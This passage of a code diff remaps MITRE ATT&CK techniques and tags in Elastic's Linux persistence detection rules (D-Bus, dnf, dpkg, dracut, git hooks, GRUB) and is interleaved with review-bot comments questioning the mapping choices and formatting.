@@ -147,9 +147,9 @@ reference = "https://attack.mitre.org/tactics/TA0003/"
 framework = "MITRE ATT&CK"
 
 [[rule.threat.technique]]
-id = "T1546"
-name = "Event Triggered Execution"
-reference = "https://attack.mitre.org/techniques/T1546/"
+id = "T1543"
+name = "Create or Modify System Process"
+reference = "https://attack.mitre.org/techniques/T1543/"
 
 [rule.threat.tactic]
 id = "TA0004"
diff --git a/rules/linux/persistence_dbus_unsual_daemon_parent_execution.toml b/rules/linux/persistence_dbus_unsual_daemon_parent_execution.toml
index dc908e15502..6d9c71de08e 100644
--- a/rules/linux/persistence_dbus_unsual_daemon_parent_execution.toml
+++ b/rules/linux/persistence_dbus_unsual_daemon_parent_execution.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/01/21"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/22"
 
 [rule]
 author = ["Elastic"]
@@ -79,7 +79,18 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "low"
-tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Persistence",
+ "Tactic: Privilege Escalation",
+ "Tactic: Execution",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend",
+ "Data Source: SentinelOne",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -112,9 +123,40 @@ process.parent.name == "dbus-daemon" and process.args_count > 1 and not (
 framework = "MITRE ATT&CK"
 
 [[rule.threat.technique]]
-id = "T1559"
-name = "Inter-Process Communication"
-reference = "https://attack.mitre.org/techniques/T1559/"
+id = "T1543"
+name = "Create or Modify System Process"
+reference = "https://attack.mitre.org/techniques/T1543/"
+
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1543"
+name = "Create or Modify System Process"
+reference = "https://attack.mitre.org/techniques/T1543/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
 
 [rule.threat.tactic]
 id = "TA0002"
diff --git a/rules/linux/persistence_dnf_package_manager_plugin_file_creation.toml b/rules/linux/persistence_dnf_package_manager_plugin_file_creation.toml
index f6f393dd312..10ca2105f97 100644
--- a/rules/linux/persistence_dnf_package_manager_plugin_file_creation.toml
+++ b/rules/linux/persistence_dnf_package_manager_plugin_file_creation.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/06/25"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/22"
 
 [rule]
 author = ["Elastic"]
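Review bot: The Execution entry loses T1559 (Inter-Process Communication) in favour of T1059.004 (Unix Shell), but the query context in the hunk header (`process.parent.name == "dbus-daemon" and process.args_count > 1`) keys on D-Bus activation, not on a shell interpreter, and T1559 was the technique that described that behaviour. If the query body (outside the hunk) does not restrict the child to a shell, T1059.004 overstates what is detected and `id = "T1559"` should be kept alongside it. The two new T1543 entries for Persistence and Privilege Escalation assume the child was started through a D-Bus service definition, which the shown query context does not establish; if that is the intended reading it deserves a sentence in the rule's description.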
@@ -87,7 +87,17 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "low"
-tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Persistence",
+ "Tactic: Defense Evasion",
+ "Data Source: Elastic Defend",
+ "Data Source: SentinelOne",
+ "Data Source: Elastic Endgame",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -119,6 +129,21 @@ file.path like ("/usr/lib/python*/site-packages/dnf-plugins/*", "/etc/dnf/plugin
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
+[[rule.threat.technique]]
+id = "T1543"
+name = "Create or Modify System Process"
+reference = "https://attack.mitre.org/techniques/T1543/"
+
+[[rule.threat.technique]]
+id = "T1546"
+name = "Event Triggered Execution"
+reference = "https://attack.mitre.org/techniques/T1546/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1546.016"
+name = "Installer Packages"
+reference = "https://attack.mitre.org/techniques/T1546/016/"
+
 [[rule.threat.technique]]
 id = "T1574"
 name = "Hijack Execution Flow"
@@ -128,3 +153,11 @@ reference = "https://attack.mitre.org/techniques/T1574/"
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/linux/persistence_dpkg_package_installation_from_unusual_parent.toml b/rules/linux/persistence_dpkg_package_installation_from_unusual_parent.toml
index 509d2fcb489..595ab2d545a 100644
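Review bot: The `@@ -128,3 +153,11 @@` hunk adds a `[[rule.threat]]` entry whose only content is the Defense Evasion tactic, with no `[[rule.threat.technique]]` under it; the same tactic-only Defense Evasion entry is added in the dracut section (L2537) and in the four git-hook sections (L2540, L2542, L2543, L2545). A tactic without a technique contributes no ATT&CK technique coverage and exists only to justify the new `Tactic: Defense Evasion` tag in the tags hunk. Either map the specific Defense Evasion technique each of these rules is meant to cover under the entry, or drop the entry and the tag together so the mapping stays honest.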
--- a/rules/linux/persistence_dpkg_package_installation_from_unusual_parent.toml
+++ b/rules/linux/persistence_dpkg_package_installation_from_unusual_parent.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/07/09"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/22"
 
 [rule]
 author = ["Elastic"]
@@ -80,7 +80,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "low"
-tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Persistence",
+ "Data Source: Elastic Defend",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "new_terms"
 query = '''
@@ -91,6 +98,11 @@ process.args:("-i" or "--install")
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
+[[rule.threat.technique]]
+id = "T1543"
+name = "Create or Modify System Process"
+reference = "https://attack.mitre.org/techniques/T1543/"
+
 [[rule.threat.technique]]
 id = "T1546"
 name = "Event Triggered Execution"
@@ -101,6 +113,11 @@ id = "T1546.016"
 name = "Installer Packages"
 reference = "https://attack.mitre.org/techniques/T1546/016/"
 
+[[rule.threat.technique]]
+id = "T1574"
+name = "Hijack Execution Flow"
+reference = "https://attack.mitre.org/techniques/T1574/"
+
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
@@ -110,19 +127,20 @@ reference = "https://attack.mitre.org/tactics/TA0003/"
 framework = "MITRE ATT&CK"
 
 [[rule.threat.technique]]
-id = "T1546"
-name = "Event Triggered Execution"
-reference = "https://attack.mitre.org/techniques/T1546/"
+id = "T1195"
+name = "Supply Chain Compromise"
+reference = "https://attack.mitre.org/techniques/T1195/"
 
 [[rule.threat.technique.subtechnique]]
-id = "T1546.016"
-name = "Installer Packages"
-reference = "https://attack.mitre.org/techniques/T1546/016/"
+id = "T1195.002"
+name = "Compromise Software Supply Chain"
+reference = "https://attack.mitre.org/techniques/T1195/002/"
 
 [rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
+
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["process.parent.executable"]
diff --git a/rules/linux/persistence_dpkg_unusual_execution.toml b/rules/linux/persistence_dpkg_unusual_execution.toml
index 41b46686434..73a6322b954 100644
--- a/rules/linux/persistence_dpkg_unusual_execution.toml
+++ b/rules/linux/persistence_dpkg_unusual_execution.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/07/09"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/22"
 
 [rule]
 author = ["Elastic"]
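Review bot: The second threat entry becomes Initial Access (TA0001 with T1195.002) here, but the tags hunk earlier in this file section (`@@ -80,7 +80,14 @@` on the previous line) drops `Tactic: Privilege Escalation` without adding `+ "Tactic: Initial Access",`, so the tags no longer list every tactic the threat mapping declares. The dpkg_unusual_execution section on the next line has the same gap: Initial Access in the threat table, only `Tactic: Persistence` in the tags. Any tag/tactic consistency check will report these as a missing `Tactic:` tag, so add the tag in both files.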
@@ -78,7 +78,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Persistence",
+ "Data Source: Elastic Defend",
+ "Resources: Investigation Guide"
+]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -105,6 +112,16 @@ id = "T1546.016"
 name = "Installer Packages"
 reference = "https://attack.mitre.org/techniques/T1546/016/"
 
+[[rule.threat.technique]]
+id = "T1543"
+name = "Create or Modify System Process"
+reference = "https://attack.mitre.org/techniques/T1543/"
+
+[[rule.threat.technique]]
+id = "T1574"
+name = "Hijack Execution Flow"
+reference = "https://attack.mitre.org/techniques/T1574/"
+
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
@@ -114,16 +131,16 @@ reference = "https://attack.mitre.org/tactics/TA0003/"
 framework = "MITRE ATT&CK"
 
 [[rule.threat.technique]]
-id = "T1546"
-name = "Event Triggered Execution"
-reference = "https://attack.mitre.org/techniques/T1546/"
+id = "T1195"
+name = "Supply Chain Compromise"
+reference = "https://attack.mitre.org/techniques/T1195/"
 
 [[rule.threat.technique.subtechnique]]
-id = "T1546.016"
-name = "Installer Packages"
-reference = "https://attack.mitre.org/techniques/T1546/016/"
+id = "T1195.002"
+name = "Compromise Software Supply Chain"
+reference = "https://attack.mitre.org/techniques/T1195/002/"
 
 [rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
+name = "Initial Access"
+id = "TA0001"
+reference = "https://attack.mitre.org/tactics/TA0001/"
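Review bot: Two style inconsistencies in this file section: the tags array in the first hunk ends with `+ "Resources: Investigation Guide"` without the trailing comma every other multi-line tags block in this diff uses, and the rewritten tactic table in the last hunk lists `name = "Initial Access"` before `id = "TA0001"`, whereas every other `[rule.threat.tactic]` table in the diff is ordered `id`, `name`, `reference`. Both parse fine, but aligning them now (`id = "TA0001"` first, then `name = "Initial Access"`, and a trailing comma on the last tag) avoids a noise diff the next time the file is reformatted.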
diff --git a/rules/linux/persistence_dracut_module_creation.toml b/rules/linux/persistence_dracut_module_creation.toml
index d0e21bd892a..9427236d5fb 100644
--- a/rules/linux/persistence_dracut_module_creation.toml
+++ b/rules/linux/persistence_dracut_module_creation.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/01/16"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/22"
 
 [rule]
 author = ["Elastic"]
@@ -76,7 +76,18 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "low"
-tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Persistence",
+ "Tactic: Execution",
+ "Tactic: Defense Evasion",
+ "Data Source: Elastic Defend",
+ "Data Source: SentinelOne",
+ "Data Source: Elastic Endgame",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -117,7 +128,43 @@ id = "T1542"
 name = "Pre-OS Boot"
 reference = "https://attack.mitre.org/techniques/T1542/"
 
+[[rule.threat.technique]]
+id = "T1543"
+name = "Create or Modify System Process"
+reference = "https://attack.mitre.org/techniques/T1543/"
+
+[[rule.threat.technique]]
+id = "T1574"
+name = "Hijack Execution Flow"
+reference = "https://attack.mitre.org/techniques/T1574/"
+
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/linux/persistence_dynamic_linker_backup.toml b/rules/linux/persistence_dynamic_linker_backup.toml
index 93e45dc6fa5..2dcef6e4fb8 100644
--- a/rules/linux/persistence_dynamic_linker_backup.toml
+++ b/rules/linux/persistence_dynamic_linker_backup.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/07/12"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/03/17"
 
 [transform]
 [[transform.osquery]]
@@ -153,7 +153,16 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "high"
-tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Threat: Orbit", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Persistence",
+ "Threat: Orbit",
+ "Data Source: Elastic Defend",
+ "Data Source: SentinelOne",
+ "Resources: Investigation Guide",
+]
 type = "eql"
 query = '''
 sequence by process.entity_id with maxspan=1m
@@ -183,21 +192,3 @@ reference = "https://attack.mitre.org/techniques/T1574/006/"
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1574"
-name = "Hijack Execution Flow"
-reference = "https://attack.mitre.org/techniques/T1574/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1574.006"
-name = "Dynamic Linker Hijacking"
-reference = "https://attack.mitre.org/techniques/T1574/006/"
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/linux/persistence_extract_initramfs_via_cpio.toml b/rules/linux/persistence_extract_initramfs_via_cpio.toml
index e22479339de..3116b612026 100644
--- a/rules/linux/persistence_extract_initramfs_via_cpio.toml
+++ b/rules/linux/persistence_extract_initramfs_via_cpio.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/01/16"
 integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/22"
 
 [rule]
 author = ["Elastic"]
@@ -122,6 +122,16 @@ id = "T1542"
 name = "Pre-OS Boot"
 reference = "https://attack.mitre.org/techniques/T1542/"
 
+[[rule.threat.technique]]
+id = "T1543"
+name = "Create or Modify System Process"
+reference = "https://attack.mitre.org/techniques/T1543/"
+
+[[rule.threat.technique]]
+id = "T1574"
+name = "Hijack Execution Flow"
+reference = "https://attack.mitre.org/techniques/T1574/"
+
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
diff --git a/rules/linux/persistence_git_hook_execution.toml b/rules/linux/persistence_git_hook_execution.toml
index 2406032af88..55473220b03 100644
--- a/rules/linux/persistence_git_hook_execution.toml
+++ b/rules/linux/persistence_git_hook_execution.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/07/15"
 integration = ["endpoint", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/22"
 
 [rule]
 author = ["Elastic"]
@@ -83,7 +83,18 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "low"
-tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Resources: Investigation Guide", "Data Source: Crowdstrike"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Persistence",
+ "Tactic: Execution",
+ "Tactic: Defense Evasion",
+ "Data Source: Elastic Defend",
+ "Data Source: SentinelOne",
+ "Resources: Investigation Guide",
+ "Data Source: Crowdstrike",
+]
 type = "eql"
 query = '''
 sequence by host.id with maxspan=3s
@@ -98,6 +109,24 @@ sequence by host.id with maxspan=3s
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
+[[rule.threat.technique]]
+id = "T1543"
+name = "Create or Modify System Process"
+reference = "https://attack.mitre.org/techniques/T1543/"
+
+[[rule.threat.technique]]
+id = "T1574"
+name = "Hijack Execution Flow"
+reference = "https://attack.mitre.org/techniques/T1574/"
+
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
@@ -116,12 +145,7 @@ reference = "https://attack.mitre.org/tactics/TA0002/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
-[[rule.threat.technique]]
-id = "T1546"
-name = "Event Triggered Execution"
-reference = "https://attack.mitre.org/techniques/T1546/"
-
 [rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/linux/persistence_git_hook_file_creation.toml b/rules/linux/persistence_git_hook_file_creation.toml
index 10d5c0ad0dd..c5b9d78a19a 100644
--- a/rules/linux/persistence_git_hook_file_creation.toml
+++ b/rules/linux/persistence_git_hook_file_creation.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/06/26"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/22"
 
 [rule]
 author = ["Elastic"]
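Review bot: The new Persistence entry for this git-hook rule maps T1543 (Create or Modify System Process) and T1574 (Hijack Execution Flow), while the `@@ -116,12 +145,7 @@` hunk on the same line removes T1546 (Event Triggered Execution) from the old Persistence entry; the same swap is made in the git-hook file-creation, netcon and process-execution sections (L2542, L2543, L2545). A git hook is a script run when a repository event fires, which is what T1546 describes, whereas T1543 covers system services and daemons and T1574 covers altering how a legitimate program resolves what it executes; neither describes hook scripts as directly. Unless a cross-rule mapping convention is being applied here, `id = "T1546"` should stay under TA0003, with T1574 added only if the rule also watches for hook-path hijacking.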
@@ -84,7 +84,18 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "low"
-tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Persistence",
+ "Tactic: Execution",
+ "Tactic: Defense Evasion",
+ "Data Source: Elastic Defend",
+ "Data Source: SentinelOne",
+ "Data Source: Elastic Endgame",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -114,11 +125,42 @@ file.extension == null and process.executable != null and not (
 framework = "MITRE ATT&CK"
 
 [[rule.threat.technique]]
-id = "T1546"
-name = "Event Triggered Execution"
-reference = "https://attack.mitre.org/techniques/T1546/"
+id = "T1543"
+name = "Create or Modify System Process"
+reference = "https://attack.mitre.org/techniques/T1543/"
+
+[[rule.threat.technique]]
+id = "T1574"
+name = "Hijack Execution Flow"
+reference = "https://attack.mitre.org/techniques/T1574/"
 
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/linux/persistence_git_hook_netcon.toml b/rules/linux/persistence_git_hook_netcon.toml
index b1d7c9ec078..3c79ca6de78 100644
--- a/rules/linux/persistence_git_hook_netcon.toml
+++ b/rules/linux/persistence_git_hook_netcon.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/07/15"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/22"
 
 [rule]
 author = ["Elastic"]
@@ -85,7 +85,16 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Persistence",
+ "Tactic: Execution",
+ "Tactic: Defense Evasion",
+ "Data Source: Elastic Defend",
+ "Resources: Investigation Guide",
+]
 type = "eql"
 query = '''
 sequence by host.id with maxspan=3s
@@ -110,14 +119,19 @@ sequence by host.id with maxspan=3s
 framework = "MITRE ATT&CK"
 
 [[rule.threat.technique]]
-id = "T1071"
-name = "Application Layer Protocol"
-reference = "https://attack.mitre.org/techniques/T1071/"
+id = "T1543"
+name = "Create or Modify System Process"
+reference = "https://attack.mitre.org/techniques/T1543/"
+
+[[rule.threat.technique]]
+id = "T1574"
+name = "Hijack Execution Flow"
+reference = "https://attack.mitre.org/techniques/T1574/"
 
 [rule.threat.tactic]
-id = "TA0011"
-name = "Command and Control"
-reference = "https://attack.mitre.org/tactics/TA0011/"
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
@@ -140,12 +154,7 @@ reference = "https://attack.mitre.org/tactics/TA0002/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
-[[rule.threat.technique]]
-id = "T1546"
-name = "Event Triggered Execution"
-reference = "https://attack.mitre.org/techniques/T1546/"
-
 [rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
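Review bot: The `@@ -110,14 +119,19 @@` hunk replaces the Command and Control entry (T1071, TA0011) with a Persistence entry, and the tags hunk above it drops `Tactic: Command and Control`; for a rule whose filename and sequence query (`sequence by host.id with maxspan=3s` in the hunk header, body outside the hunk) pair hook execution with a network connection, that was the tactic distinguishing it from the other git-hook rules on this page. Dropping it leaves the network-connection half of the detection unmapped. Consider keeping the TA0011 entry and its tag in addition to the new Persistence entry.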
diff --git a/rules/linux/persistence_git_hook_process_execution.toml b/rules/linux/persistence_git_hook_process_execution.toml
index eaaeea7afa9..2203dc37a30 100644
--- a/rules/linux/persistence_git_hook_process_execution.toml
+++ b/rules/linux/persistence_git_hook_process_execution.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/06/26"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/22"
 
 [rule]
 author = ["Elastic"]
@@ -89,7 +89,19 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "low"
-tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Persistence",
+ "Tactic: Execution",
+ "Tactic: Defense Evasion",
+ "Data Source: Elastic Defend",
+ "Data Source: Crowdstrike",
+ "Data Source: SentinelOne",
+ "Data Source: Elastic Endgame",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -115,6 +127,24 @@ not process.name in ("git", "dirname")
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
+[[rule.threat.technique]]
+id = "T1543"
+name = "Create or Modify System Process"
+reference = "https://attack.mitre.org/techniques/T1543/"
+
+[[rule.threat.technique]]
+id = "T1574"
+name = "Hijack Execution Flow"
+reference = "https://attack.mitre.org/techniques/T1574/"
+
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
@@ -133,12 +163,7 @@ reference = "https://attack.mitre.org/tactics/TA0002/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
-[[rule.threat.technique]]
-id = "T1546"
-name = "Event Triggered Execution"
-reference = "https://attack.mitre.org/techniques/T1546/"
-
 [rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/linux/persistence_grub_configuration_creation.toml b/rules/linux/persistence_grub_configuration_creation.toml
index 0e3eb428f97..d3c5b78af10 100644
--- a/rules/linux/persistence_grub_configuration_creation.toml
+++ b/rules/linux/persistence_grub_configuration_creation.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/01/16"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/22"
 
 [rule]
 author = ["Elastic"]
@@ -76,7 +76,18 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "low"
-tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Persistence",
+ "Tactic: Execution",
+ "Tactic: Defense Evasion",
+ "Data Source: Elastic Defend",
+ "Data Source: SentinelOne",
